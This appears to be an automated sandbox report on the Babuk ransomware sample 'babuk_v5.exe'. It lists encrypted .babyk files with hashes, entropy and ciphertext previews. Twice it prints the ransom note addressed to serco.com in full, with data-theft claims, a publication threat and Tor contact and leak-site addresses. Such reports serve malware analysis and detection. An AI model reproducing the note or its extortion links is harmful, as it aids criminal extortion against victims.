                                                                            Preview: ....3.&. ..f......_V.P.).<.#n..x{9(8@.(......_.gY9Sd...).._m..d.q....lp.............`&.az..j..53Q3^_f./....Y.F......?..~Z.yE..^..h..P...qF4.i.W.G..t...a].....................^"..j.RG..Lu..Al...< .X...w..L&.o.~...E.\.2Z.VP.>n...N.2..1..U|...f...L[..d..6..j.g..% C.o.w&.Jv..r<i,.).FvNl..7..`.e..?m)......}XtW...\x.=.....B..j......E..k....1.a....5....A*....4}...0.w....k.4&*<...."SlW...w...nm..Q..#...F,}.%yP.<.f....k\..@.PH.[..O....4.....V..E.........)9.(..*.2`mS}.....9K.?.@.$..%..4AY,#....M..uV.....Dd.....e..0........-. ...Ov.>../K$.I...........2...jg....B......._..Y.L.['J.r^......o...8..H7...}.S=.&fH..2J.Lw...J7..K../.j.w.K..P'....z.WT......}...._H.^.i.9......nv.....,.}F.Q(...q~n.>f.....--u..d..).f..Iq"....kW...{.G..7.T\+...e....Y........pIQ.US.*.K.tCW.....[..hM.....pw/..B.Z.........g...#..u\....." .......)....K.g..FO..Ht.(......h.....w...5.v..`=.ie....4.X....M....KI.=.H.x.e"m.......%I..2%.?..U{....2.L0.._...oq.&...E.......F.t{I<
                                                                            C:\Users\user\Documents\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.840484872491164
                                                                            Encrypted:false
                                                                            SSDEEP:24:yjlDJSk0w+iLRthwbyZ4/5cvqBv9AEqhUM6NXXMjb1UTkYB7:yWTAhwbgKcvqBGEiUM6a31UQYB7
                                                                            MD5:88F94F52436DA6F6BC6EF3A502A83EFB
                                                                            SHA1:86CA4993E92390B5EC6813A00EFDB6FC8E3B57A0
                                                                            SHA-256:A921EC99E18DB1A4E566246D3E14EDB615EB15A4BF9AAC1E5A1AA9844B038A50
                                                                            SHA-512:1884B6B76B87BBF77FE26B7EC743632BF7E9A562D257AEB7D4BFFB161815535201B6C6D0FFD75F1711E251724FF7C4A57B3D6529E254922767D7CED667892611
                                                                            Malicious:false
                                                                            Preview: .h...`......T..d..._.z.....j#...o.f..F2P..A..S..."h...J......Y(d..o.8N....@%...6.tz./V.DC....JaG*9;4.H..Z&Z.o...qW}."~..MMD....~bM.K~w....@{8w.}^......V.AQ...]...J...G.Oe.A)..aXnB........._j.i...g]D...~..3EK.....zV@%r.'.)<.T.0FO....bh0...\Q..$.(H.MK....t....[.).=0.uO.......E....@..:DCEW.....u..x.#|.9.@T[.3.$`>'5...z.".J&.P...U..yn.?......~B.(..<.3.......P...g..:d.G{..`g'.x..g......c;..m..|X.....c.iMb.....b..QM..m).w..U..*.>....HL.$oZ.=...BO5.y..67.....1=...g.*I.r.{......,#.......:....F...:.<}......g.vy.Rt2.U.z).....R..5...cH..F..S...=G..P7S}0..B!m9!D.....-....$.....L...[&...%.......6.I^....f.........m\...3....7C...z..g...A...1..4..KO.+{...z..K-r...8.gx...z.....,....E......Mkl9/.W.J..7./.......O.z....c..7.....%...>. .B....E.t.v.`{......$_.....#..\9:..p(."-..m.O...+.(..:.]...BSY&...].:....g....nr8n.O:%..}U._E.8...D...;.....].&z...v..XS...o.w.; {wS.Y.....V.w.o...W..4.I..G.E(M2....:6j.nYI~.!.....+..._4._)...6....L....hQ........o.....,....`
                                                                            C:\Users\user\Documents\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8124785319081935
                                                                            Encrypted:false
                                                                            SSDEEP:24:Ns00TBr9yD7W8WM0EbdZXQe2IhRFAlCJCGRRvTPCa0DalR:Ns0U9yJWlo3Bh2CJCGfF7
                                                                            MD5:E49E6BA9D37FABDD197299DF070F45E0
                                                                            SHA1:E20F3C72E2A60F01641E18CC6F7B18248C6AF66A
                                                                            SHA-256:ED9348078B22C05413A9EAF3C49000BE8A17F862837699CF0636DD449B8C4AD2
                                                                            SHA-512:A9B35EAE7AE2643CCCD3E79D920FD4CA734E539D37DF8943C180B39B4A99249EF58A3BE800FF5527CF679AB1D645809ED993C7135163EBAC4F8E37559FFC9EE9
                                                                            Malicious:false
                                                                            Preview: ..gq.Z..h..v?...X.h..s.....aK..maf..../...&&....48.......+...3.......~...V.*y.I..I.u.Y.3Ev........9..o..{...Wt)U.l....i9.B..x...T~....%B...y.R...?.:f6<.MNp|..........3..D.z........W...).O.....P...............VPZ...$u.F..N^...n%..E...I.R.)..._.....f.7.!.u...<$.....Jt....O.2N..J.(......R....e.:.\._..e.Ga....bM...F.?..F..Hu..hq.(d....G..b.d...?.n.....Z..-&.'..7[..4M.C..d..*CZ.>.:.W..*J.....F.d.xf<....l..H.t.."..`..g7....4..jS..r.....0...F#j..V.ibv.K..P.$..2~.R.>...}...'?....'.p...5lq.o...g .o.e"G...l...Y".........0...^.O..+.f%.2.8E.....A..xtU..+......M....?.O?..bv.S^..]...D.'oG.W........s..LY....y.1.~i...H.....f...Vh.Hu..D63..U.Y.(l..a.p.. ....G...N.....0n..]v..A....i0.. ..f.......V....2....q9...tR..%..].>pZ.U..*...._k.......1....\Q[.t..u..o.K..4.'.').....fj..1...F.......!MxX4..Xd.d*.....+8*.;..=......\......a&M..m.'MlY..d...@.......:....v....5cpl..N...b.....k..o.KSP.7@..;O.0ga....;h...K.c......@.o..x..HI....-..x`..)O...!..w..Jt.
                                                                            C:\Users\user\Documents\KZWFNRXYKI\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.825219466837543
                                                                            Encrypted:false
                                                                            SSDEEP:24:rUAAEVjyV41ViHnBz8ATZOkaABPqcFFSBXZM/wlktG7:rUAAZ41V8h8ATZOkaGqcfSVuSkY7
                                                                            MD5:81697EAEFAE446EC2B87F27C89FABE81
                                                                            SHA1:E25338485FD0B55C2081DB72B4D5927E0FFFD9F6
                                                                            SHA-256:90C42034282789007A62FB560F530EA252FCAC7CDC7DB07CB94DBE23328B36AE
                                                                            SHA-512:81A11C42BF50331D875A4C02BC9D1893580C4366DD7A4FE90640655F3DDD2B809708E605C7FA3C251B572E11B3D6EA53240A07FAA793EC21EA9AA8031E9C8167
                                                                            Malicious:false
                                                                            Preview: ...y....S.)..r1....~.EkF.v.-..bf..D..U....R.o.B....h.V=....M.5.!...YA:/......x5....uG....E..3...h&X..>.......Z3....Q...@....9lg......4...S.T.kh...dhj4.Hd.....^..S.P.D.......$g....|.k'@...e7...p4#Z.%ETx...s...D....k.....T.yY^.NN.}..4u......7.0..X.zwXV..H.pp.......pfwb.....-G....._.....T.j..&.....M..%./.Kb..x\A.x..5.@].......<E.(......r...qi.$.0.....x`w..!..rw.....|.;e.P..4....C.u.YG.,.6...)....'Cn..........|..G....\.<.6)...~.Fl(..;^R..`9g.z...TDl.X*........VI..X...*k....`.TUO.....g.)..}.d...=h..+m...c.:^V.......C6a...[.@.7.k.g....F.$.h.I.....N.......E.....97*m...lD_.?..m..4_m....%.p.8y.G........M.N..>...9r 2.....=....\.a...........@=..>W&..+...].....$@...^...y"L)...Z.(......?...+l.....au..0.%Q1.42....P.a...e.......i..$.T......o.6..../.N....@.)..^...M. ..T.2.WO.U.0.v:...|.....j...|.v.GY&.|..o..Lv.D./.]........Vxx...9X.4......^.......,~R~.."........v0(...._.!9.A\...t7d..X.Z......x/l....Mr.V!`(.K]...8."a.b......k.[....z^..(.`o.b..
                                                                            C:\Users\user\Documents\KZWFNRXYKI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\KZWFNRXYKI\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8242394445006305
                                                                            Encrypted:false
                                                                            SSDEEP:24:8tgHlOBjLMg/292+opHYL9FLpXdSFUR8ImCcJYyZX3WisFHa2xEjLS:8WHlOBj4l2VYJXdSrF6yXIF5xE6
                                                                            MD5:08E3EC2F7A6714570070CB918CFEB412
                                                                            SHA1:4F488A7ED594F4750BD5F1E6F0CCAF5AE3B11B5A
                                                                            SHA-256:82207357AF65F83A1830EBCC4ED17AAC8AF1AFD711EBB2CECA9B8BDE667BEB5A
                                                                            SHA-512:A5CDC7C90B88E99E62BB960246C1194831EE5CD36046790D43532598AB97595A90DCBB473B00423A565686ADFC3F9ECE9DE3D2E2071B398EDAC7136D6BBD1A63
                                                                            Malicious:false
                                                                            Preview: [..7.'..T.F......U.].../..U..2.~Y....1a.9..XB.'.....u.;.-....=.Ut......c...P...^..ac..U-..'..l.$...2.-wA..(.....0.&.a4.)mT.+....j~.W9.s2..M.{#...[?..&HX..d,H....<.h...6K...6[....q.%.|.........*....c.HrV.W..l..#~....+...t.0.7.?.... i..yZLb.pFi$...R......vWCh.<..}i.r..N..R..\..../...!...E..............Ak......|..QHv@..^ ..[+%.....0.V...h..L..L..~..U..Bm...E..k....S...Wn....gJZ..W.{....F.".....&[....P.....G-.Y..o7*..H.I..9.o..6..".^`...I~c_-.:..>.v.\r..^........,..C.;..w...l.X<Y..om'.1...I.1..'(......KQ......:9.A..s.&^...GwN.......a%.<'y........A...p......CF...wTVc.-O.t...(......J!8.Z.h.+..Jj.!..w..xCDq0.w.;.>}.....V.E..F... ..,G......z[.l.{...?.m..qc....!.|^.G...(..!N..&.p....#F.I.*..}y@..6.X..#.....&..a.........~...+D..2.MW.H.u....coq. .jjt.A.x1.n..F..Ij1.wp."...G.&.V...-..".M9Y.UR7.........x..5.o>q.[..P.19.x%..s...[k.4.Gg26;..k8$.I.&..~.J.a.)....j.z...c.../!..y........3?........A.A#-:w9"..|...d.. 9!.d.l.0...K.cV.2.[..S..k.....j.Pm..3.
                                                                            C:\Users\user\Documents\KZWFNRXYKI\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.83561134429068
                                                                            Encrypted:false
                                                                            SSDEEP:24:D+AXBVLNN48BbPvRIqFkfJE0ozCjeMwmoBKCn0eeE:D/RVZN4ebRXK7ozIDwbl
                                                                            MD5:3FA12E195169A491657C9B826AEAB137
                                                                            SHA1:DA792699652B73CDAC195E381D77E04C808C3183
                                                                            SHA-256:7D0F14A3FCA3A86884EA062D4CE73D8B7ED7B92C8021A06788262C1CB6B7A3D2
                                                                            SHA-512:88EE65550B8803834A4DC4B5209B30BBADEBE7B1FCA3EA777EBE5B747A50884485838AE5C0162546C70453EDA20CF028D73552F6ACE05058DD8115EA1F83A1DF
                                                                            Malicious:false
                                                                            Preview: .....7..~}....ja.O...."?...(u'....i.A.UI.DQ...AX..8_...i."3..G.....{.....8>s..qgv.Fq.O..'.p....X.Vz.^@.@w......_..>p....z...#f..D.IsE.D.....-.(*.>@.XX.e?......!.t..e<.-...6.2..rfw.gp.H.EC...#..i...PL........../.iCIFb...^.!o.s1.A;........b....}N.C.-.S+.=f.6.g........9p..d.0\.......)i..n.J[-....].R....9}1.\..]......%*....`.$E..1...O...D......%D....}l.J.._].b.L@............K.....6......f.!k;...*...;..D.7e....3..Rj.A.=0g...L...."...~._....:.S..^P:B6T.g.m)..'.!..tk8..|...5.D..U.........E...;?ZN%...2.....].6bc.>.:.4.....(o..]......fEb/L..a..r...9... T-..e:._......t.S...<....z...Z..T.O..2,oG0....~L..).>.aG-..HF.=_xr.....{Q.0......6.Yrk.7HU..3.4..6.@..*.r.w.p.Ns..Y={..`..Z...H\.c..g...>...k...}.....{Y~4...Q.H*...e..G...|...\.&h!....e.u.&..q..M..E..JX..ku0...........-..a......^z...o...jo.Ms.....y.y.'..j.O....p.."........`....p.(O+.VP..F+. ..V.n....&..n./.<vK..K.E5../i.......98.%/..n...=a..n.1...1...<....b......z.L...|n.L5..PL....P-..g.....GP%.s..
                                                                            C:\Users\user\Documents\KZWFNRXYKI\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.813812253740189
                                                                            Encrypted:false
                                                                            SSDEEP:24:5dXROZJ1xaU9jLropGIkd0gaWvLC3Zba1WxJ771WN4r1P/mk730hfKEkI:nyJ1xaURBIkdSFa1MTrl/mkQwW
                                                                            MD5:C283D79F8EC410594555112F0A8E300E
                                                                            SHA1:F66A45426BA1977873132A969165D51A5D76F914
                                                                            SHA-256:FFBBB0CD873DD9DA5E74FFCFF14C895883036A7D7B7D1BA9BA2D6CEB633B6139
                                                                            SHA-512:95549FF825B803CCB382E1ADE6F5FE32D0A04C0406FB7E753E008611681EF6853C644AF5763087EA0934467B775956FD07743809990394319CAB01B6DB8D8037
                                                                            Malicious:false
                                                                            Preview: .v*..^c....M^.&.c............!...C...[.).k.0~RG.J..\?.nkQA.q..Q..G/.s..q... .}..'.F.p.{k......%..4.j...!..8..V:....._.16D(......J...qW......##.?VV..f&..V...:...Vw..HO...D......Hm....+....v.....!%.E.v...n/~...0.p..X....Y.<DzN..K.+.}..J9.Z.m(.I@.......X...Y..=.6.K4Qt4..v...Gy.K..o*G..r,1.Qn.).v...........CY.C.[.E."E.L'CZ..>.W..c.@T.w|..!.m..=6...]/.......5.B.R..u.v...m.G..).D ....R.g.957g_p....}:w.G.._.;.......).....G..E...;.0ql.i.....3..f....Wx. ...e.z...J..wj@....8U..u[.aSf<SJ..`&..7..SV.3[W....ede..cm8..&.Mu.....I.wvm.}.o.v..el...GbR...$.w..6D0A9.z.&./...<.D...>..<.~.y..{....[|..).X......,D..}%...2.=..=".b.....9..h....X..b*...;q......C......A..c..K.-yH.0...M!B.......u....0|.y..W.F..V..h.s....J.X).....O.B.../...^..z...C/.h.o...q..{[..W.>...Yu^6M...H[LH_.....N..`.&.^...l....z.&>..1}..v..[ o!......mLw....}.Nkc...]%....t.t..w...;.+K%..(r8...90H"/.F\..bRtvG...r.."....4.....t...?....g.U.xo`.....$g..b.....Z..D.V.X`.....!.}.....l
                                                                            C:\Users\user\Documents\KZWFNRXYKI\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.813470388900282
                                                                            Encrypted:false
                                                                            SSDEEP:24:nOKahQuPT6rY34fmLSz6NMMTX9pvdAn9ZzFCz+AW3pCgTGkILa:OKwQ82rYofCSL87dA/oVWsgmLa
                                                                            MD5:B3F358B0DE940F85BA81B9E83BC6600C
                                                                            SHA1:E5CC270AE862ADBB31CCC8E04C2398D280B44192
                                                                            SHA-256:4E68BDAA02045598E508E8E8B3F09D8CA842B93EACA0B897A0035A2BB83586D3
                                                                            SHA-512:243F5461C284C4F8869C05875EBE3B88078F73EA2B2DF3FDC812AC42050EA9E32CD68D28DF50135CD2135A537E429F00E64E2D60FE0F2D1A77B0E8E6A1F56F79
                                                                            Malicious:false
                                                                            Preview: y...vif.QS.P...0....F...G....a.8.4..TZ."..S...y.t...m.-syNQ...<8$o.T1_D...'.:.b.~...E..4....Z..@.....W...,z.........^.2......r"...7...!..]?..y.1..:.=..<d`.JW1}7..6t..y...@%...d...3.{.../........H.>.....by.P.@.6e....I...Z...L0.""..FX...#..{."gVc..@c..6d....O..+.1...........{.....&.S...+xE../+B..W.X....B.U..w......~......R.D{.w]..#z4.D..G.{)..3....0.%.hon.........hL...,.=P....tp2`B<.Y............^\.s.S...wI...._a..z..?fK..F..g.J....@...Z"i.QE.'...Z.....C...A.v..h3....}..^...(..N.D.N..[......[...&.^....X..E.l80]....v..^......2.I....X.w..y(i.)........'&....tvU.....;NA%...e.....=...#-..E;u6..g3...r;... 4.v.2..U...`5....%....Q...W.:1.O.5.i....S..g....h......o2...r..P......./R.....t.....?.....v.x.../...g.`...sx~z.7.......;RSm....n$.P.DD.....J|.......{1..2i.m%..8.OA..Vn.(.l..kR....K.%..........?Z5......1n....A..."$Rl^.....x|4..P...8.|.,3CM..t.y.qmt=.g....W.*.....5.+.Y.l. #o.4...[6D..&A.m.~-.?..|..w?...@\..] ..j.+T...z.S.(..2@..I..-.l...^..&.....`
                                                                            C:\Users\user\Documents\KZWFNRXYKI\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.824258169604056
                                                                            Encrypted:false
                                                                            SSDEEP:24:2z7EgemyfE/F1yOmdBaEJVI9Rbd+l5rYf2B3RcPYFirP:2z7EgemycN1yOa8CGa7MPi8
                                                                            MD5:E9A5B1EB6B07201F290FD448FAC96284
                                                                            SHA1:7B40D2D479B811B0805BD4F8FAEDA7E2F5A51A34
                                                                            SHA-256:40C94698EAD713A343C5B175845795C5763580F779F9D319A6A5DC573AA4C6BC
                                                                            SHA-512:253D56229947ADCCE2B407F34A3D0205D6FEFCD96AC5A7736E16D9D3E6A2F282FB27C1830350F3C90689E74F26E29592F622B740727CDE96B34A88A5A8F1B18D
                                                                            Malicious:false
                                                                            Preview: 7...p.G.P...k.@...2.[.9x..7.S.S.KX.....'..\.....=.........T.....k..Fu3r...e.......<P.^......V.y1.`..{..|......mrS...UV....(.TU^3.<...:.v...~..$k|..5M..io[r..).....D..s.`2.h.....I.(...T.~...$.(..}%oG.h&..Kg....86..au..#.29}.a.&Ur.r.0.........o@?....Q.............J..._../N.E....j.j.bX.......F.L...;.}..r..H8I...WH-...+.[....TD<.F.Nh..Q+#.....x..V.... ........jX.#.b..tL........g....D..<..e.s..qX._;s....y..a,..0...F...B.. g3TVf.p....c.K-a...1.....-..0....v[x.(R...f.....S._.37v.....x.D..".U8.....Fz/.~No..}T4...*{......q...&.. .GS...W..{o/I........g.....G..\.UO...Z.N.0s#...Y.....'...m.J.}._.E.\....F...c..Ba)$.P.o.(>(p......9..Z7.6.......*OY.0.l......9f...6.h...!..2."..A.q.Bg.4.....6[...+."......a><r....-b.~.._.OxD..YX...,..cg.....5......D......H.S%...?`|.Ap...hz../..."V.Q.YL.-....vI3...J.V.....#.C. .u.......k..3Xu.....O........F.Oy~.t.9~?.u...kH|p........:*A-. .-.u.....r. .s..8g..o.......+S?1...Y.....X...4..K1...z...(....9...3.E..\B..T..u_T.nY
                                                                            C:\Users\user\Documents\NEBFQQYWPS\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.79477543233275
                                                                            Encrypted:false
                                                                            SSDEEP:24:yGe3uFt3Muc4aV36xa5kwvQ6v8g+8C4HK90n7Nn9/LH4qMlTMP69u1buv0j3K:yGe3uL3I36z6EgNA9a77cFe6sbukK
                                                                            MD5:33E64A67E2138EBB530E490EAA0B820C
                                                                            SHA1:3EC21420AFBEACA891007F15C8EBE74B34639EB4
                                                                            SHA-256:7839C9F7E9789F6F8449F83994AEA079A665A400382A938DD4511996284E4EEB
                                                                            SHA-512:5169976D3BCF7206CEE2C5778C525A21013B73C2B312BABD2D5A4A7DFB9DBFF4813B583749D70BE1176A855281EDEA61FFF715E066EE2A5D113825BC8CF5B6DC
                                                                            Malicious:false
                                                                            Preview: .&..=....~.!.k..L...n.).#{@.0..1....fbw..4.l..rI........S.e.k.......*1]...<P.lXr...G.>.H0..:j....v..O,.vDF..|d......d..3I+A.f...9.a-.["?G....y...5.B......^q.$.g..~.........,....;....=s.......*..I..zBo$k=G.[...]..._.8=g...o..u...Z.Y...s...N.8h..n.....P...D.&<S..B{7$.....;.+...FwA.d...t.9v..g~(..X...l.GO.1..........IA.....;....i.........?.<.U!l........T.}..*.s.q...4.].z,.Ri....{.E..<>.6a.G.+........5$..FU.....pB.APX.]..n...7...=....6......\....;....n.X.+. ...x...,q.Gt.QJ..T.P....'d...>\.........{..{...d......T......<..?`@aj...`......V.Kj...7.=..Q..vB...x.=@|...Co_...C.....0...9.,...5...V^..nz...6..K.R....5...9i.a..vEk}.3r.Y.M..W...RX.>!..R.D...8....-O...G....gK.,......IX.G{.]..-T..{i...GA.N.f..n.w.c.8;{.....V.z.w...U...~..r<..4*O...'c...Q.W...uX;.....}*.^2.z.=...M..V.<.`.Dc..6.V....|F...a..vS.....*...J.O.Qz..C...zY..n..M..Qi..Vm...51..4.W..j....!..C.q..g.!g.^.._fa..+.fV..0.Yo........$.S....]+.8.).)...J..-.)...w..m[_L.....2JV..O5....#.|f..4
                                                                            C:\Users\user\Documents\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.833547524020572
                                                                            Encrypted:false
                                                                            SSDEEP:24:QmIUE0ve8NxS8SyEz5vUsRf5mBdlrbmkYmTrSCZQk6ZPb5hxgpK:QKve8NxSrdhUsf5EJS8J6ZPVhxgw
                                                                            MD5:6DC9A0F966CC9EE59ADCA7065483A8EA
                                                                            SHA1:2BD63BF32358558DFFC2A2725B76FA38A1B94FCF
                                                                            SHA-256:8D7967B5B509D95519ACD3250E6C413D759B2F45F2CD56983CF8613B80BC0996
                                                                            SHA-512:A015479AF37B69B7B1AD79DF40F3EE08D6BB3FB21AA3C64E0C4012C37F7DC9289A8D4B309C8EF5E6148C4E119AB43E82982DAF6E071AD1DA8902C9FA5389A903
                                                                            Malicious:false
                                                                            Preview: q..0.....j.&...ym5..H..S.T...T>..^.,..$.9..e..}[.n..yZ......'.YB..../A.D._8P5:.s..O..K`..V~W.N..mFH!.y..a...wb..Z%.[...A.V.O....C...\ .j..xd..}....N..7.H..`Y=2...n..?.._.Ju.&.X..."%M...]T-+%T9M..D.Spq....m......M;.v.*.#Z...=.a.a...U.V`..mq..F.<4...N...$Q.(6*.g..d....f...C./D[L?h..+tz}.............5....z.......:....s.?...-.u.]"...1.}.........&..[...u......C.+q...'M?.#....QI....v(.G....gv{Uxn.p.<.a......s..56Q.D.L0..@5.5..._w.7.a/.RK..wJ6>.-;..?.L.g....w.-..K.!t.I...Mf.f....=^.*R.e....,..B$rrR.g.7.?.?c?\...)....$p..=P..RW..(c...s....k.Z.)P{n......lg.`........}.......8.{........-...@../.....#2....9X.jJw.UY..Bt.p.}....k..j ..X}...|-.{m..>..Lg.x... [.;.....).qvo.....A.Yz....m7N.de.#.....f.tx..sH*.v..Z......V..,. s..v..?.4..A..;.>w..t..........j..R..,-...;..{...,....U..4,.....#...S....}.n..W...7.`.oO.c.0.,.5w){y@x.._.w...<02.Xl....;$_..>....f.X..D....O.n.)..y..T.m}..G.e.{J......H...5[.......[c.e.....s.0...8F....}%..K"....@.L.V...'.........
                                                                            C:\Users\user\Documents\NIKHQAIQAU.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.820655117629328
                                                                            Encrypted:false
                                                                            SSDEEP:24:9FYWnwkeckPij1CHcG80Q+QDj7an6fdiS3TPX7A7f60d9RNhLZGs71HkQvJ:9FVwckKQ8t+QJ1iOfofjvRjLZVvJ
                                                                            MD5:24EF76B491C313A1F46ECCC53403A826
                                                                            SHA1:C693D53AF951B8E582D1A5BC838BD5F7A2ACFD3B
                                                                            SHA-256:2793B7D23350F66C38A0504A5DED96ADAAFED6760345E27D74D553887282A718
                                                                            SHA-512:C5641A31C58BFA7E0C67DEE206DB156678891BA9BD86CEB5836E85689C6C05FE5A8C22B592E2B08572E896FB649222AC2FCF673DB951BB5D78373BB32B707812
                                                                            Malicious:false
                                                                            Preview: .......E..s.@.8.R..=P{Y-#..Y.X......_.#X9P,.58e..xN-~.1p.`...xJ..#s....!.RC...\..\ov..ob.R..!.."..F.V.+'....tD..d...$.B...7..W@j....eE?.eQ.C.Zk.uN.!*.U...x....HRC...j<oE.E......2.U9.$....}......8].w.9.~u..;.O..."....,q.1B..@u.C..l.@QB....kt.4&...f.>........f......7..A8O.>cxVb8..Y.p||.u..|xf.A...Lo.v.......].KY^...^P...\.$d*.........yV!g..8.......>J./. \.-\.jhR.f`._W.]......L..q..4>.{....P..k.z.....p....w.V.H&.?E.O#.2.... ....P....+..o p.^....B...V..........P.Q.^../...&......PWda.c...KP..T4...k.0....-.r..L.~iO....;[GPQ,.OG......a\.cmH..<8...3....C.-.d....n.i-azD.Z\...0A.;.$%...| b..E.....>[....0..G.-.i..ec.. .._....9.........$...{+........H.0q...r]...<..Ts...3..W?/.q.B..U....G.Z..e#.6.._.(.V.l[.0.a.......F.f..x-./a..~K..yg../.`.~...w G.B;..3Y.CA[...z.o...w[R.>+:...7#(....oX..m....e.....R..(.M..GP>..,m...Z.Kb..p.-..-F...h....BE..L..[...=..)..M.C....\..e....H.....<T).,Jy..;.L..Y..U.&G....=cC.K...|{.....J.[.n..S:Mm-'0..H.{=2@X.^..E..^..Xuzc......^
                                                                            C:\Users\user\Documents\NIKHQAIQAU\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.816553483852325
                                                                            Encrypted:false
                                                                            SSDEEP:24:PaiQqtROP5NX/JzurYJ4AG7rqGqrsZAUS5v7Rzcf4YBl1fi5:PvTbOP5NPJu0Jy+GrtSV+fbBlQ5
                                                                            MD5:68DC6CAFD0A9DE51A1C918242EF9A9CD
                                                                            SHA1:C207140429A0E3E4DC4EF3F1C805E018D42780A6
                                                                            SHA-256:5F57CD613F40FB4F55C438BCED0DA9BD09022E2C09A466E5C213BCC301C82D70
                                                                            SHA-512:C5DF121EBE52588742CB483D31594940944C5D8ECB59016B9E519840C9EA8BAA304F40E35BB4BA858E15166D40E048747B000D6AA70F46B9B39750345DDB6A39
                                                                            Malicious:false
